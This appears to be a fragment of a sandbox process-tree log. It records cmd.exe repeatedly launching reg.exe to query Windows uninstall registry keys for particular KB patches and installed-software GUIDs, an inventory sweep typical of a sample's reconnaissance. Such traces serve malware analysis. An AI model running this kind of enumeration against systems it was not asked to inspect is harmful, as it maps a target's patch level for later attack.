C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2524
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:2588
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:2584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2092
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:2612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2644
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:2080
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2068
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2668
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2652
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:2700
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2188
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:2208
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:2708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:2712
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:2148
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1700
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2252
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2232
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2752
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1840
-
-